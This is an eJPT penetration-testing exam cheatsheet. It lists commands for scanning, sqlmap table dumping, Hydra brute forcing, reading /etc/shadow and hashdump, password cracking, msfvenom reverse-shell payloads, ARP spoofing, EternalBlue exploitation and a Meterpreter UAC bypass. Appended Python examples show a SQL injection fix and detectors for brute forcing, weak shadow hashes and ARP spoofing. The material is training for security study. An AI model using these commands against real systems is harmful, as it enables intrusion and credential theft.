#### Twitter: https://twitter.com/HunterxSatam

#### LinkedIn: https://www.linkedin.com/in/sattam-almohsen/

#### YouTube: https://www.youtube.com/channel/UCLHbnIG05-F5xw6kvNt47nQ

---

# eJPT-Cheatsheet
This is a cheatsheet for the eJPT exam & course.

## Nmap
```sh
nmap -sn 10.10.10.0/24              # Host discovery (ping sweep, no port scan)
nmap -sV -sC 10.10.10.10            # Best choice for scanning: service versions plus default scripts
nmap -A 10.10.10.10                 # Aggressive scan (OS, versions, scripts, traceroute): very general and noisy
nmap -p- --script=vuln 10.10.10.10  # Vulnerability assessment with the "vuln" script category on all TCP ports
```
## fping
```sh
fping -a -g 10.10.10.0/24 2>/dev/null   # Host discovery: -a prints alive hosts, -g generates targets from the range
```
## IP Route
**Syntax**\
`ip route add <network> via <gateway> dev <interface>`
```sh
ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0

ip route        # Check defined routes in Linux
route           # Check defined routes in Linux (legacy net-tools)
route print     # Check defined routes in Windows
```
## Networking Commands

**Finding the IP address and MAC address**
```sh
ipconfig /all   # Windows
ifconfig        # Linux
```
**Checking a specific host**
```sh
ping 10.10.10.10   # Test whether a destination IP address exists and answers
```
**Tracing the route an IP packet takes**
```sh
tracert google.com      # Windows
traceroute google.com   # Linux
```
**Checking the ARP table**
```sh
arp -a         # Show the ARP table on Windows
ip neighbour   # ARP table on Linux (same as "ip neigh")
```
**Checking for listening ports on a machine**
```sh
netstat -ano     # Windows
netstat -tlunp   # Linux
```

## Dirbuster

![alt text](https://github.com/SattamInfosec/SattamInfosec/blob/main/Dirbuster.PNG)


## Gobuster
```sh
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt

gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt -x php   # -x: also try the .php extension
```


## Netcat
**Listening for a reverse shell**
```sh
nc -nvlp 1234
```
**Banner Grabbing**
```sh
nc -nv 10.10.10.10 <port>
```
## SQLMap
#### Check if an injection exists
```sh
sqlmap -r Post.req                                                             # Raw request saved from Burp/browser
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id                             # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"    # POST method
```
#### Get databases if an injection exists
```sh
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs                             # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs    # POST method
```
#### Get tables in a database
```sh
sqlmap -r login.req -D dbname --tables
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables                             # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables    # POST method
```
#### Get the data in a database table
```sh
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump                             # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump    # POST method
```
## MySQL

**Remotely**
```sh
mysql -u <user> -p -h <host> -D <database>
```
**Locally**
```sh
mysql -u <user> -p
```

## Hydra
**SSH & FTP login brute-forcing**
```sh
hydra -L userslist -P passwordslist ftp://10.10.10.10   # Many users, many passwords
hydra -l root -P passwordslist ssh://10.10.10.10        # One user, many passwords
hydra -L userlist -p password123 ftp://10.10.10.10      # Many users, one password
```

**HTTP POST Form**
```sh
hydra -L usernames.txt -P passwords.txt -f -V 10.10.10.10 http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials"
# -f stops after the first valid pair, -V prints every attempt; the last field is the failure string in the response
```

*You will know which wordlists to use when the time comes*

## Password Cracking

#### To extract the users with their password hashes from the OS
```sh
hashdump           # Windows (meterpreter)

cat /etc/shadow    # Linux (terminal)

get /etc/shadow    # Linux (FTP server)
```
#### John
```sh
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt   # Crack the hashes from your previous output (hashdump, shadow file) saved to hashes.txt

# Another way to crack passwords (requires the shadow file together with the passwd file)
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```

## XSS
```sh
```
*This is a great filter bypass cheatsheet*\
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

## XSS via GET & POST Request

![alt text](https://raw.githubusercontent.com/SattamInfosec/SattamInfosec/main/XSS%20Via%20GET%20%26%20POST.PNG)

## msfvenom shells
**JSP Java Meterpreter Reverse TCP**
```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f raw > shell.jsp   # Tomcat content management system
```
**EXE**
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe > shell.exe   # Windows system
```
**PHP**
```sh
msfvenom -p php/meterpreter_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f raw > shell.php   # PHP web application
cat shell.php | pbcopy && echo '<?php ' > shell.php && pbpaste >> shell.php   # Prepend the PHP open tag the raw output omits (pbcopy/pbpaste are macOS)
```
## ARPSpoof
```sh
echo 1 > /proc/sys/net/ipv4/ip_forward   # Forward traffic so the target keeps its connectivity
arpspoof -i <interface> -t <target> -r <host>
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
```
## SMB Enumeration
**Get shares, users, groups, password policy**
```sh
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445
nmap -p445 --script=smb-vuln-* 10.10.10.10
```
**Access a share**
```sh
smbclient //10.10.10.10/share_name
```
## FTP Enumeration
```sh
nmap --script=ftp-anon 10.10.10.10 -p21
nmap -A -p21 10.10.10.10
```

**Log in to the FTP server**
```sh
ftp 10.10.10.10
```
## FTP Server Commands
```sh
get filename   # Receive a file
put filename   # Upload a file
cd /../..      # Change the remote working directory
ls /..         # List the contents of a remote directory
```
## Metasploit Framework
```sh
msfconsole                                # Run the framework
search <term>                             # Search for a specific module
show exploits                             # Another way to display exploits
show payloads                             # Display payloads
use exploit/windows/smb/ms17_010_psexec   # Select an exploit
show options                              # Check options and required values
set <option> <value>                      # Configure an option
exploit                                   # Run the exploit
```
## Metasploit Meterpreter autoroute
```sh
run autoroute -s 10.10.10.0/24
```
## Meterpreter
```sh
ps
getuid
getpid
getsystem
search -f *.txt                               # Search for files
download filename /root/<local_dir>           # Download from the victim machine to your machine
upload /<local_dir>/exploit.exe C:\\Windows   # Upload from your machine to the victim machine
shell                                         # Run a standard operating system shell
sysinfo                                       # Information about the victim machine
background                                    # Switch from the Meterpreter session back to the msfconsole command line
```
**Check UAC/privileges**
```sh
run post/windows/gather/win_privs
```
**Bypass UAC**
*Background the session first*
```sh
use exploit/windows/local/bypassuac
set session <session_id>
run
```
## MS17-010 EternalBlue SMB Remote
```sh
exploit(windows/smb/ms17_010_psexec)> set RHOST <target_ip>
exploit(windows/smb/ms17_010_psexec)> set LHOST <your_ip>
exploit(windows/smb/ms17_010_psexec)> run
```
**After PrivEsc**
```sh
migrate <pid>   # Move into a more stable process (take the pid from "ps")
hashdump        # Extract the users with their password hashes
```
## Windows Command Line
**To search for files and folders**
```sh
dir /b /s "*.conf*"
dir /b /s "*.txt*"
dir /b /s "*filename*"
cd              # With no argument prints the current directory, like "pwd" in Linux
type filename   # Same as "cat" in Linux
systeminfo      # Information about the operating system
```

**Check users**
```sh
net users          # Users in Windows
cat /etc/passwd    # Users in Linux
```

**List drives on the machine**
```sh
fsutil fsinfo drives   # Windows
lsblk -l               # Linux
```
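## Added example: what sqlmap is probing for (vulnerable query beside the parameterized fix)

The SQLMap section above runs the tool against `file.php?id=1`; the Python below is an added example, not code from the cheatsheet, showing the application-side defect it detects and the fix. It uses an in-memory SQLite table (constructed sample rows, assumed user names) in place of the target's MySQL backend, so it runs offline.

```python
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the target's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, role) VALUES (?, ?, ?)",
        [(1, "alice", "user"), (2, "bob", "user"), (3, "admin", "admin")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_id):
    """The pattern behind file.php?id=1: the parameter is spliced into the SQL text."""
    sql = f"SELECT id, username, role FROM users WHERE id = {user_id}"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    """Hardened form: validate the type, then bind the value so it can never change the query structure."""
    try:
        user_id = int(str(user_id).strip())
    except ValueError:
        return []  # reject anything that is not a plain integer id
    return conn.execute(
        "SELECT id, username, role FROM users WHERE id = ?", (user_id,)
    ).fetchall()

def demo():
    """Run both lookups with a normal id and with the boolean-based probe sqlmap sends."""
    conn = make_db()
    normal = "2"
    tampered = "2 OR 1=1"
    return {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_tampered": lookup_vulnerable(conn, tampered),   # returns every row: the table leak sqlmap --dump automates
        "safe_normal": lookup_safe(conn, normal),
        "safe_tampered": lookup_safe(conn, tampered),         # rejected before the query runs
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The point a developer should take away: `-p id` succeeds because the id is concatenated into the query text; binding it through `?` (or MySQL's prepared statements) closes the class of bug, and the type check on top gives a cheap second line of defense.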
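## Added example: spotting the Hydra runs above in auth logs

The Hydra commands in the cheatsheet leave a dense burst of failed logins from one source. This added detection script (not part of the original page) parses constructed sshd lines in `/var/log/auth.log` format, counts failures per source address inside a sliding window, and notes whether a successful login followed the burst. Host name, IPs and the year passed to the parser are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines; not captured from a real host.
SAMPLE_LOG = """\
Mar 10 09:00:01 target sshd[1201]: Failed password for root from 10.10.11.5 port 51122 ssh2
Mar 10 09:00:02 target sshd[1203]: Failed password for invalid user admin from 10.10.11.5 port 51124 ssh2
Mar 10 09:00:02 target sshd[1205]: Failed password for root from 10.10.11.5 port 51126 ssh2
Mar 10 09:00:03 target sshd[1207]: Failed password for root from 10.10.11.5 port 51128 ssh2
Mar 10 09:00:04 target sshd[1209]: Failed password for root from 10.10.11.5 port 51130 ssh2
Mar 10 09:00:05 target sshd[1211]: Accepted password for root from 10.10.11.5 port 51132 ssh2
Mar 10 09:05:00 target sshd[1300]: Failed password for alice from 10.10.10.20 port 40000 ssh2
Mar 10 09:20:00 target sshd[1400]: Failed password for alice from 10.10.10.20 port 40002 ssh2
Mar 10 09:20:01 target sshd[1402]: Accepted publickey for alice from 10.10.10.20 port 40004 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse(log_text, year=2024):
    """Return (timestamp, ip, user, result) tuples; syslog lines carry no year, so one is assumed."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"]))
    return events

def find_bruteforce(events, threshold=4, window_seconds=60):
    """Sources with at least `threshold` failures inside `window_seconds`, and whether a success followed."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in events:
        by_ip[ip].append((ts, user, result))
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [e for e in evs if e[2] == "Failed"]
        for i in range(len(failures)):
            j = i
            while j < len(failures) and (failures[j][0] - failures[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= threshold:
                last_fail = failures[j - 1][0]
                alerts[ip] = {
                    "failures": j - i,
                    "users": sorted({f[1] for f in failures[i:j]}),
                    # a success right after the burst is the signal to escalate: the spray likely worked
                    "success_after_burst": any(e[2] == "Accepted" and e[0] >= last_fail for e in evs),
                }
                break
    return alerts

if __name__ == "__main__":
    for ip, info in find_bruteforce(parse(SAMPLE_LOG)).items():
        print(ip, info)
```

The `-L userlist -p password123` spray shows up in this output as several distinct users behind one source, which is why the alert records the user set rather than just a count; the slow pair of failures from `10.10.10.20` stays below the threshold, as ordinary typos should.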
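## Added example: auditing the shadow file John is pointed at

The Password Cracking section feeds `/etc/shadow` to John. This added audit script (not from the cheatsheet) reads constructed shadow lines, identifies the crypt(3) algorithm from the `$id$` prefix, and lists the accounts a defender should fix first: empty password fields and legacy hashes (md5crypt, traditional DES) that a rockyou run gets through quickly. The hash bodies in the sample are placeholders, not real hashes.

```python
# Constructed /etc/shadow sample; "PLACEHOLDERHASH" stands in for real hash material.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASH:19700:0:99999:7:::
alice:$1$abcdefgh$PLACEHOLDERHASH:19700:0:99999:7:::
svc_backup::19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
bob:!$6$saltsalt$PLACEHOLDERHASH:19700:0:99999:7:::
carol:$y$j9T$saltsalt$PLACEHOLDERHASH:19700:0:99999:7:::
legacy:abJnggxhB/yWI:19700:0:99999:7:::
"""

# crypt(3) prefixes and how worthwhile a wordlist attack against them is
ALGORITHMS = {
    "1": ("md5crypt", "weak"),
    "2a": ("bcrypt", "ok"),
    "2b": ("bcrypt", "ok"),
    "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "7": ("scrypt", "ok"),
    "y": ("yescrypt", "ok"),
}

def classify_hash(field):
    """Map the second shadow field to (algorithm, risk)."""
    if field == "":
        return ("none", "critical")            # empty field: login without any password
    if field.startswith(("!", "*")):
        return ("locked", "locked")            # password login disabled for this account
    if field.startswith("$"):
        ident = field.split("$")[1]
        return ALGORITHMS.get(ident, ("unknown:" + ident, "review"))
    return ("descrypt", "weak")                # 13-char traditional DES crypt, 8-character password limit

def audit_shadow(text):
    """Return {user: {"algorithm": ..., "risk": ...}} for every entry in the file."""
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        algo, risk = classify_hash(parts[1])
        report[parts[0]] = {"algorithm": algo, "risk": risk}
    return report

def findings(report):
    """Accounts to act on first: no password at all, or a hash type a wordlist run chews through quickly."""
    return sorted(u for u, r in report.items() if r["risk"] in ("critical", "weak"))

if __name__ == "__main__":
    rep = audit_shadow(SAMPLE_SHADOW)
    for user, info in rep.items():
        print(f"{user:12} {info['algorithm']:12} {info['risk']}")
    print("act first:", findings(rep))
```

Locked (`!`/`*`) entries are reported separately because they are not crackable targets at all, and a `!` in front of an otherwise valid hash means the password still exists but is disabled, which matters if someone later unlocks the account without rotating it.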
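## Added example: detecting the ARPSpoof run from the victim's neighbour table

The ARPSpoof section poisons `10.100.13.37` so that `10.100.13.36` resolves to the attacker's MAC. On the target, the "Checking the ARP table" command (`ip neigh`) then shows one MAC answering for two IPs, and the gateway's MAC differs from what it was before. This added script (not part of the original cheatsheet) parses constructed `ip neigh` output and flags both conditions; the attacker address `10.100.13.50`, the MAC values and the baseline entry are assumed.

```python
import re
from collections import defaultdict

# Constructed "ip neigh" output as seen from 10.100.13.37 while its cache is poisoned; not a real capture.
SAMPLE_NEIGH = """\
10.100.13.36 dev tap0 lladdr aa:bb:cc:dd:ee:50 REACHABLE
10.100.13.50 dev tap0 lladdr aa:bb:cc:dd:ee:50 REACHABLE
10.100.13.40 dev tap0 lladdr aa:bb:cc:dd:ee:40 STALE
10.100.13.41 dev tap0 FAILED
"""

# Known-good MAC for the host we care about (here the gateway), recorded while the network was healthy.
BASELINE = {"10.100.13.36": "aa:bb:cc:dd:ee:36"}

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9A-Fa-f:]{17}) (?P<state>\S+)$"
)

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a resolved link-layer address (FAILED/INCOMPLETE rows are skipped)."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def duplicate_macs(table):
    """MACs that answer for more than one IP: the usual footprint of ARP spoofing."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def baseline_mismatches(table, baseline):
    """IPs whose current MAC differs from the recorded one, as (expected, observed)."""
    return {
        ip: (baseline[ip], table[ip])
        for ip in baseline
        if ip in table and table[ip] != baseline[ip]
    }

def check(text, baseline):
    table = parse_neigh(text)
    return {
        "duplicates": duplicate_macs(table),
        "mismatches": baseline_mismatches(table, baseline),
    }

if __name__ == "__main__":
    print(check(SAMPLE_NEIGH, BASELINE))
```

A duplicate MAC on its own is not proof, since a router that owns several addresses on one interface looks the same; the baseline comparison is the stronger signal, which is why both checks are reported side by side. The same parser works on the output of `arp -n` with a small change to the regular expression.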